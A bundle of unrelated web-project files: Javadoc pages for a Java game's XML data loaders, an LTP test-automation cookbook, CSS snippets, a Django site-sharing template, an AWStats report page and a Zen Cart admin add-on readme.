java.awt.FontFormatException</pre> <div class="block">Returns scenario with specified ID from file in specified directory</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>scenariosDir</code> - Directory with scenarios</dd> <dd><code>scenarioId</code> - Scenario ID</dd> <dd><code>gc</code> - Slick game container</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Game world area scenario or null if scenario with such ID was not found</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>java.awt.FontFormatException</code></dd> <dd><code>org.newdawn.slick.SlickException</code></dd> <dd><code>java.io.IOException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> </dl> </li> </ul> <a name="getQuests-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getQuests</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/core/quest/Quest.html" title="class in pl.isangeles.senlin.core.quest">Quest</a>&gt;&nbsp;getQuests(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified XML quest base file and returns map with quests ID's as keys and quest as values</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>questsBase</code> - Base file name in data/quests dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with quests ID's as keys and quest as values</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getObjects-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getObjects</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/ObjectPattern.html" title="class in pl.isangeles.senlin.data.pattern">ObjectPattern</a>&gt;&nbsp;getObjects(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified XML base with game objects to map with objects patterns as values and objects IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>objectsBase</code> - Name of base file in data/objects</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with objects patterns as values and objects IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getWeapons-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getWeapons</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/WeaponPattern.html" title="class in pl.isangeles.senlin.data.pattern">WeaponPattern</a>&gt;&nbsp;getWeapons(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified XML base and returns map with weapon patterns</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>weaponsBase</code> - Name of base file in data/item dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with weapon patterns as values and weapons IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getArmors-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getArmors</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/ArmorPattern.html" title="class in pl.isangeles.senlin.data.pattern">ArmorPattern</a>&gt;&nbsp;getArmors(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified XML base and returns map with armor patterns</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>armorBase</code> - Name of XML base in data/item dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with armor patterns as values and armor IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getTrinkets-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getTrinkets</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/TrinketPattern.html" title="class in pl.isangeles.senlin.data.pattern">TrinketPattern</a>&gt;&nbsp;getTrinkets(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified XML base and returns map with trinkets patterns</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>trinketsBase</code> - Name of XML base in data/item dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with trinkets patterns as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getMisc-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getMisc</h4> <pre>public static&nbsp;java.util.Map&lt;java.lang.String,<a href="../../../../pl/isangeles/senlin/data/pattern/MiscPattern.html" title="class in pl.isangeles.senlin.data.pattern">MiscPattern</a>&gt;&nbsp;getMisc(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Returns map with miscellaneous item patterns as values and its IDs as keys</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>miscBase</code> - Name of misc items base in data/item</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>Map with miscellaneous item patterns as values and its IDs as keys</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getRecipes-java.lang.String-"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getRecipes</h4> <pre>public static&nbsp;java.util.List&lt;<a href="../../../../pl/isangeles/senlin/core/craft/Recipe.html" title="class in pl.isangeles.senlin.core.craft">Recipe</a>&gt;&nbsp;getRecipes(java.lang.String&nbsp;basePath) throws javax.xml.parsers.ParserConfigurationException, org.xml.sax.SAXException, java.io.IOException</pre> <div class="block">Parses specified recipes base to list with recipe objects</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>recipesBase</code> - String with recipes base name in data/item catalog</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>List with recipes objects</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>javax.xml.parsers.ParserConfigurationException</code></dd> <dd><code>org.xml.sax.SAXException</code></dd> <dd><code>java.io.IOException</code></dd> </dl> </li> </ul> <a name="getScript-java.lang.String-"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>getScript</h4> <pre>public static&nbsp;<a href="../../../../pl/isangeles/senlin/cli/Script.html" title="class in pl.isangeles.senlin.cli">Script</a>&nbsp;getScript(java.lang.String&nbsp;scriptFileName) throws java.io.FileNotFoundException</pre> <div class="block">Parses script with specified name in current module script dir</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>scriptFileName</code> - Name of script in current module script dir</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>List with commands for game CLI</dd> <dt><span class="throwsLabel">Throws:</span></dt> <dd><code>java.io.FileNotFoundException</code></dd> </dl> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a name="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="class-use/DConnector.html">Use</a></li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../index-files/index-1.html">Index</a></li> <li><a href="../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../../pl/isangeles/senlin/util/Coords.html" title="class in pl.isangeles.senlin.util"><span class="typeNameLink">Prev&nbsp;Class</span></a></li> <li><a href="../../../../pl/isangeles/senlin/util/GConnector.html" title="class in pl.isangeles.senlin.util"><span class="typeNameLink">Next&nbsp;Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../../index.html?pl/isangeles/senlin/util/DConnector.html" target="_top">Frames</a></li> <li><a href="DConnector.html" target="_top">No&nbsp;Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../allclasses-noframe.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a name="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
doc/automation-cookbook.html
anthony-kolesov/arc_ltp
<html> <head> <title>autoltp cookbook</title> </head> <body bgcolor="#ffffff" vlink="#800000"> <div align="center"><big><big><big><b>LTP Automation<br> using autoltp</b></big></big></big></div> <br> <br> <big><big><b>Prerequisites</b></big></big> <ul> <li>All LTP installation prerequisites must be met<br> </li> <li>Perl modules Net::SFTP and Net::SSH::Perl <b>must</b> be <a href="http://www.cpan.org/misc/cpan-faq.html#How_install_Perl_modules">installed</a> on MASTER machine. (<a href="http://www.cpan.org/">www.cpan.org</a> for instructions/downloads)</li> <li>MASTER and TARGET machines must have sftp and ssh capabilities.<br> </li> <li>IP addresses may replace hostnames in this document if name service is unavailable.<br> </li> </ul> <big><big><b>Install files</b></big></big> <ul> <li>Go to <a href="http://ltp.sf.net/" target="_top">http://ltp.sf.net</a> -&gt; Downloads -&gt; Download latest version of LTP</li> <li>Login as root on MASTER machine</li> <li>Untar ltp-xxxxxxxx.tgz in /root</li> <ul> <li>tar -xzvf &lt;filename.tgz&gt;</li> <li>mv ltp-&lt;yyyymmdd&gt;.tgz ltp <i>(&lt;yyyymmdd&gt; should be replaced with the drop date you are using</i></li> </ul> </ul> <big><big><b>Setup/Edit config files</b></big></big> <ul> <ul> </ul> </ul> <ul> <ul> </ul> </ul> <ul> <li>edit runalltests.sh and modify the run line to include the PAN_LOG options:</li> <ul> <li>ex: <i>${LTPROOT}/pan/ltp-pan -l $PAN_LOG -e -S $instances $time -a $$ -n $$ -f ${TMP}/alltests</i></li> </ul> <li>tar up the ltp directory (<i>this is the ltp.tgz that is copied to the TARGET machines</i>)</li> <ul> <li>in the root directory of MASTER type tar -czvf ltp.tgz to tar up the testcases</li> <li>copy the resulting ltp.tgz to /tmp on MASTER (<i>autoltp will look for /ltp.tgz in the tmp directory</i>)<br> </li> </ul> <ul> </ul> </ul> <ul> <ul> </ul> </ul> <big><big><b>Run LTP</b></big></big><br> <ul> <li>cd to /root/ltp/auto on MASTER</li> <li>create a config file that contains the list of hosts (TARGETS) to run LTP against</li> <ul> <li>example config file:<br> host1,username,password,number of instances,time<br> host2,username,password,number of instances,time</li> <li>host is the hostname of a TARGET machine<br> </li> <li>username is usually root or a root privileged account</li> <li>number of instances is how many copies of LTP you want running simultaneously</li> <li>time is the duration of the ltp run where 10m = 10 minutes, 2h = 2 hours, etc</li> </ul> <li>run ./autoltp -f &lt;config file&gt;</li> <li>autoltp will then attempt to make ssh/sftp connections with your TARGET machines and run the LTP testcases<br> </li> </ul> <ul> </ul> </body> </html>
sites/default/files/css_injector/css_injector_3.css
alezyy/roommates
.col-sm-6 { width: 50%; }
gui/portal/500.html
sourtin/igem15-sw
<h1>500 Internal Service Error</h1> This indicates that the referenced service (probably bound to gunicorn) is not running on the server. Maybe it died with a useful error? Time to debug!
templates/sharesite/onesite_list.html
weaponsjtu/neteye
<html> <head> <link rel="icon" href="/static/favicon.ico" mce_href="/favicon.ico" type="image/x-icon"> <link rel="stylesheet" type="text/css" media="screen" href="/static/css/site-list.css"> <link rel="stylesheet" type="text/css" media="screen" href="/static/css/bootstrap.min.css"> <link rel="stylesheet" type="text/css" media="screen" href="/static/css/bootstrap-responsive.min.css"> <script type="text/javascript"> function share() { var str = document.getElementById("exitOrReg").value; if (str == "退出") { alert("已成功添加到你的分享!"); } } </script> </head> <body> <div id="wangji_screen"> <div id="list_page"> <div id="header"> <div id="logo-floater"> <h1> <a href="/" title="The Book of Web Business"> <img src="/static/image/logo.png" alt="The Book of Web Business" id="logo"> <span>分享您喜欢的网站,让网络生活丰富多彩...</span> </a> <span id="login-botton"> <a href="{{ label2 }}">{{ label1 }}</a> | {% if label5 %} <a href="{{ label2 }}">{{ label5 }}</a> | {% endif %} <a href="{{ label4 }}">{{ label3 }}</a> <input id="exitOrReg" type="hidden" value="{{ label3 }}"> </span> </h1> </div> </div> <div class="site-broadcast"> 网站公告: 留下您宝贵的意见,点击<a href="/siteinfo">这里</a>. 现在大家可以将优秀的网站<span style="color: red">添加到自己的个人空间分享</span>里了,还等什么,赶快逛逛吧... </div> <div> <form action="/sharesite/result/" method="post"> {% csrf_token %} <div class="topsu"> <div class="bd"> <div class="topsu-items"> <ul> <li> <a href="/">首页</a> </li> <li> <a href="/0">游戏</a> </li> <li> <a href="/1">音乐</a> </li> <li> <a href="/2">电影</a> </li> <li> <a href="/3">学习</a> </li> <li> <a href="/4">生活</a> </li> <li> <a href="/5">其它</a> </li> <li> <input name="searchbox" class="search-input" type="text" value autocomplete="off"> <input class="btn-submit" type="submit" value="Search"> </li> </ul> </div> </div> </div> </form> </div> <!-- yu lu <div id="ana"> <div id="ana_title">经典语录</div> <div id="ana_refer"> <script type="text/javascript" charset="UTF-8" src="http://www.yulu.info/javascript.asp"> var specialcode="<DIV id=ana_refer style='Z-INDEX: 100; left: 1px; POSITION: absolute; TOP: 50px;'><TABLE cellSpacing=0 cellPadding=0 width=145 style='font-size:14px;color:#000000'><TR><TD style='CURSOR: hand' onclick=searchspe.style.visibility='hidden' align='center' width=145>关 闭</TD></TR></TABLE><table border='0' width='145' id='table1' bordercolor='#2E6287' height='95'><tr><td><a href='xunji/index.html' target='_blank'><img src='images/layout/ad_xunji.gif' width='145' height='95' border='0' /></a></td></tr></table></DIV>";document.write(specialcode);lastScrollY=0;function heartBeat0(){diffY=document.body.scrollTop;percent=.1*(diffY-lastScrollY);if(percent>0)percent=Math.ceil(percent);else percent=Math.floor(percent);document.all.searchspe.style.pixelTop+=percent;lastScrollY=lastScrollY+percent;}window.setInterval("heartBeat0()",1); </script> </div> </div> --> <div id="sidebar"> <div class="sideGrp"> <div class="side-share"> <a href="/sharesite/1/add/"><h3 class="share_button">Share Website Anonymousy</h3></a> </div> <div class="day-commend"> <h3 class="day-shema">今日推荐</h3> <div class="day-content"> <h2><a rel="nofollow" href="/sharesite/17/">MapCrunch -- Random Google Street View</a></h2> <h4>MapCrunch 这个迷人的网站能够随机带你逛遍全球美景。进入网站首页,全球某一个地方的美图就会随机出现在你眼前,拉动图片上的箭头就会三维空间移动。让你仿佛身临其境,流连忘返。右侧栏里有地名供你选择,让你有目的性的选择参观地。再点击右下方的“GO”就可以足不出户纵览世界美景。</h4> </div> </div> <div class="day-popular"> <h3 class="day-shema">最新分享</h3> <div class="day-content"> <ul> {% for object in objectlist.object_list %} <li><a rel="nofollow" href="/sharesite/{{ object.id }}/">{{ object.title }}</a></li> {% endfor %} </ul> </div> </div> </div> </div> <div class="fb"> <a class="random-access" href="/sharesite/{{ randnum }}/">Go To a Random Website</a> <ul id="bookmarklist" class="bookmarks"> {% for object in objectlist.object_list %} <li class="post first bookmark-0"> <div class="bookmark"> <div class="title"> <h2> <a rel="nofollow" href="/sharesite/{{ object.id }}/">{{ object.title }}</a> <span class="saverem"> <em class="bookmark-actions"> <strong> <a class="inlinesave" href="/sharesite/{{ object.id }}/share/" onclick="share()">Share</a> </strong> </em> </span> </h2> <div id="title-fix"> <span class="author">Published by <b>{{ object.user }}</b></span> <span class="comments">{{ object.comments_set.count }} 条评论 > </span> </div> </div> <div class="date"> <span> {{ object.pub_date.year }} </span> <span> {{ object.pub_date.month }}.{{ object.pub_date.day }} </span> </div> </div> <h4>{{ object.info }}</h4> <div> <a href="{{ object.domain }}" target="_black"> <div class="domain"> 霸气顶入: {{ object.domain }} </div> </a> </div> </li> {% endfor %} </ul> <div class="pagination"> <span class="step-links"> {% if objectlist.has_previous %} <a href="?page={{ objectlist.previous_page_number }}">previous</a> {% endif %} <span class="current"> Page {{ objectlist.number }} of {{ objectlist.paginator.num_pages }}. </span> {% if objectlist.has_next %} <a href="?page={{ objectlist.next_page_number }}">next</a> {% endif %} </span> </div> </div> </div> <div class="footer"> <h3>2011 Powered by <a href="http://www.cnblogs.com/dugujiujian/" target="_black">Weapon</a> @SJTU </h3> </div> </div> </body> </html>
webstat/awstats.php-gu.ru.allemailr.022012.html
3al/krohamal
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta name="generator" content="AWStats 6.9 (build 1.925) from config file awstats.php-gu.ru.conf (http://awstats.sourceforge.net)"> <meta name="robots" content="noindex,nofollow"> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta http-equiv="description" content="Awstats - Advanced Web Statistics for php-gu.ru (2012-02) - allemailr"> <title>Statistics for php-gu.ru (2012-02) - allemailr</title> <style type="text/css"> <!-- body { font: 11px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; margin-top: 0; margin-bottom: 0; } .aws_bodyl { } .aws_border { border-collapse: collapse; background-color: #CCCCDD; padding: 1px 1px 1px 1px; margin-top: 0px; margin-bottom: 0px; } .aws_title { font: 13px verdana, arial, helvetica, sans-serif; font-weight: bold; background-color: #CCCCDD; text-align: center; margin-top: 0; margin-bottom: 0; padding: 1px 1px 1px 1px; color: #000000; } .aws_blank { font: 13px verdana, arial, helvetica, sans-serif; background-color: #FFFFFF; text-align: center; margin-bottom: 0; padding: 1px 1px 1px 1px; } .aws_data { background-color: #FFFFFF; border-top-width: 1px; border-left-width: 0px; border-right-width: 0px; border-bottom-width: 0px; } .aws_formfield { font: 13px verdana, arial, helvetica; } .aws_button { font-family: arial,verdana,helvetica, sans-serif; font-size: 12px; border: 1px solid #ccd7e0; background-image : url(/awstatsicons/other/button.gif); } th { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } th.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; padding: 1px 2px 1px 1px; font-size: 13px; font-weight: bold; } td { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:center; color: #000000; } td.aws { border-color: #ECECEC; border-left-width: 0px; border-right-width: 1px; border-top-width: 0px; border-bottom-width: 1px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px;} td.awsm { border-left-width: 0px; border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; font: 11px verdana, arial, helvetica, sans-serif; text-align:left; color: #000000; padding: 0px; } b { font-weight: bold; } a { font: 11px verdana, arial, helvetica, sans-serif; } a:link { color: #0011BB; text-decoration: none; } a:visited { color: #0011BB; text-decoration: none; } a:hover { color: #605040; text-decoration: underline; } .currentday { font-weight: bold; } //--> </style> </head> <body style="margin-top: 0px"> <a name="top"></a> <a name="menu">&nbsp;</a> <form name="FormDateFilter" action="/cgi-bin/awstats.pl?config=php-gu.ru&amp;output=allemailr" style="padding: 0px 0px 0px 0px; margin-top: 0"> <table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td> <table class="aws_data" border="0" cellpadding="1" cellspacing="0" width="100%"> <tr><td class="aws" valign="middle"><b>Statistics for:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 14px;">php-gu.ru</span></td><td align="right" rowspan="3"><a href="http://awstats.sourceforge.net" target="awstatshome"><img src="/awstatsicons/other/awstats_logo6.png" border="0" alt='Awstats Web Site' title='Awstats Web Site' /></a></td></tr> <tr valign="middle"><td class="aws" valign="middle" width="150"><b>Last Update:</b>&nbsp;</td><td class="aws" valign="middle"><span style="font-size: 12px;">25 Feb 2012 - 00:09</span></td></tr> <tr><td class="aws" valign="middle"><b>Reported period:</b></td><td class="aws" valign="middle"><span style="font-size: 14px;">Month Feb 2012</span></td></tr> </table> </td></tr></table> </form> <table> <tr><td class="aws"><a href="javascript:parent.window.close();">Close window</a></td></tr> </table> <a name="emailreceivers">&nbsp;</a><br /> <table class="aws_border" border="0" cellpadding="2" cellspacing="0" width="100%"> <tr><td class="aws_title" width="70%">Receiver EMail </td><td class="aws_blank">&nbsp;</td></tr> <tr><td colspan="2"> <table class="aws_data" border="1" cellpadding="2" cellspacing="0" width="100%"> <tr bgcolor="#ECECEC"><th colspan="3">Receiver EMail : 0</th></tr> <tr bgcolor="#ECECEC"><th width="30%">Local</th><th>&nbsp;</th><th width="30%">External</th></tr><tr><td colspan="3"><span style="color: #666688">Others</span></td></tr> </table></td></tr></table><br /> <br /><br /> <span dir="ltr" style="font: 11px verdana, arial, helvetica; color: #000000;"><b>Advanced Web Statistics 6.9 (build 1.925)</b> - <a href="http://awstats.sourceforge.net" target="awstatshome">Created by awstats</a></span><br /> <br /> </body> </html>
readme.html
lat9/admin_password_change_display
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <title>Admin Password Change Display</title> <style type="text/css"> <!-- a, a:active, a:visited { color: #006666; text-decoration: none; } a:hover { color:#00CC99; text-decoration: underline; } BODY, P, H1, H2, H3, H4, H5, H6, LI, TD, DD, DT, img { font-family: Verdana, AvantGarde, Tahoma, Arial, sans-serif; font-size: 10pt; color: black; padding: 0px; margin: 20px; } H1, H2, H3, H4 { font-weight: bold; } h1 { font-size: 20px; } h2 { font-size: 16px; border-top: 1px solid black; } code { padding-left: 25px; } ol li { margin-left: 0; } .smaller { font-size: smaller; } .corefile { color: red; } .minspacing li { margin: 5px 0; } --> </style> </head> <body> <a name="top" id="top"></a> <h1>Admin Password Change Display for Zen Cart</h1> <h3>Version 1.1.4</h3> <p>Copyright &copy; 2012-2016, <a href="http://vinosdefrutastropicales.com" target="_blank">Vinos de Frutas Tropicales</a></p> <p>Current Support Thread at Zen Cart Forums: <a href="http://www.zen-cart.com/forum/showthread.php?t=192388">http://www.zen-cart.com/forum/showthread.php?t=169227</a>. This software is provided for your use under the GNU General Public License v2.</p> <h2>Version History:</h2> <ul class="minspacing"> <li>v1.0.0, 2012-02-12, Initial release.</li> <li>v1.0.1, 2012-02-18, Added license information.</li> <li>v1.1.0, 2012-02-22, Display now includes the last login date and IP address for the currently signed-in admin.</li> <li>v1.1.1, 2014-07-10, Upgraded for Zen Cart 1.5.3 by PRO-Webs.net</li> <li>v1.1.2, 2014-12-20, Include Zen Cart v1.5.4 updates:<ul class="minspacing"> <li>/YOUR_ADMIN/includes/header.php</li> <li>/YOUR_ADMIN/includes/auto_loaders/config.zc154_compatibility.php</li> <li>/YOUR_ADMIN/includes/functions/admin_access.php <span class="smaller">(This is now based on the Zen Cart v1.5.4 version of the file)</span></li> <li>/YOUR_ADMIN/includes/init_includes/init_zc154_compatibility.php</li> <li>/YOUR_ADMIN/includes/languages/english.php <span class="smaller">(This is now based on the Zen Cart v1.5.4 version of the file)</span> <li>/YOUR_ADMIN/includes/languages/english/email_extras.php <span class="smaller">(This is the Zen Cart v1.5.4 version of the file)</span></li> </ul></li> <li>v1.1.3, 2015-12-24, Include Zen Cart v1.5.5 updates; remove /YOUR_ADMIN/includes/languages/english/email_extras.php from this distribution (I'm not sure why it was ever added!):<ul class="minspacing"> <li>/YOUR_ADMIN/includes/header.php <span class="smaller">(This is now based on the Zen Cart v1.5.5 version of the file)</span></li> <li>/YOUR_ADMIN/includes/functions/admin_access.php <span class="smaller">(This is now based on the Zen Cart v1.5.5 version of the file)</span></li> <li>/YOUR_ADMIN/includes/languages/english.php <span class="smaller">(This is now based on the Zen Cart v1.5.5 version of the file)</span> </ul></li> <li>v1.1.4, 2016-01-06, More changes from the Zen Cart v1.5.5 distribution:<ul class="minspacing"> <li>/YOUR_ADMIN/includes/header.php</li> <li>/YOUR_ADMIN/includes/languages/english.php</li> </ul></li> </ul> <h2>What it does</h2> <p>This add-on displays text within your admin page's header to let the signed-on admin know when his/her password was last changed, giving them some amount of implicit warning as to the need to change their password. The display (as of v1.1.0) also includes the admin's previous login date and IP address from which the admin logged in.</p> <p>Here is an example of the display:</p> <img src="header_image.jpg" alt="Header Image" title="Admin Header Display" /> <h2>Installation</h2> <p>There are three (3) core-file overwrites in this mod; you should <strong>always</strong> backup your cart's database and files prior to making any changes.</p> <p>Copy the admin files to your cart, after renaming the &quot;YOUR_ADMIN&quot; directory to match your custom admin folder's name:</p> <ol class="minspacing"> <li><span class="corefile">/YOUR_ADMIN/includes/header.php</span></li> <li>/YOUR_ADMIN/includes/auto_loaders/config.zc154_compatibility.php</li> <li><span class="corefile">/YOUR_ADMIN/includes/functions/admin_access.php</span></li> <li>/YOUR_ADMIN/includes/init_includes/init_zc154_compatibility.php</li> <li><span class="corefile">/YOUR_ADMIN/includes/languages/english.php</span></li> </ol> <p><b>Note:</b> If you have made previous modifications to these core-files, you will need to use WinMerge (or an equivalent program) to merge the changes. All changes for this add-on are tagged with <em>admin_password_change_display-lat9</em>.</p> </body> </html>
templates/ot_digitalbox/css/ie9.css
Siguana/linyipassport
/** # ot_digitalbox - OT DigitalBox Template for Joomla 2.5! # author OmegaTheme.com # copyright Copyright(C) 2012 - OmegaTheme.com. All Rights Reserved. # @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL # Website: http://omegatheme.com # Technical support: Forum - http://omegatheme.com/forum/ **/ /**------------------------------------------------------------------------ * file: ie9.css 2.5.0 00001, May 2012 12:00:00Z OmegaTheme $ * package: OT DigitalBox Template *------------------------------------------------------------------------*/ #ot-mainmenu ul.level0 li .menu_round .menu_round, #ot-mainmenu ul.level0 li.sfhover .menu_round .menu_round{ margin: -40px 0 0 205px; }
Quiz/doc/deprecated-list.html
PatFin/QuizManager
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_79) on Sat Aug 01 20:04:01 CEST 2015 --> <title>Deprecated List</title> <meta name="date" content="2015-08-01"> <link rel="stylesheet" type="text/css" href="stylesheet.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Deprecated List"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="overview-summary.html">Overview</a></li> <li>Package</li> <li>Class</li> <li>Use</li> <li><a href="overview-tree.html">Tree</a></li> <li class="navBarCell1Rev">Deprecated</li> <li><a href="index-files/index-1.html">Index</a></li> <li><a href="help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li>Prev</li> <li>Next</li> </ul> <ul class="navList"> <li><a href="index.html?deprecated-list.html" target="_top">Frames</a></li> <li><a href="deprecated-list.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <div class="header"> <h1 title="Deprecated API" class="title">Deprecated API</h1> <h2 title="Contents">Contents</h2> </div> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> 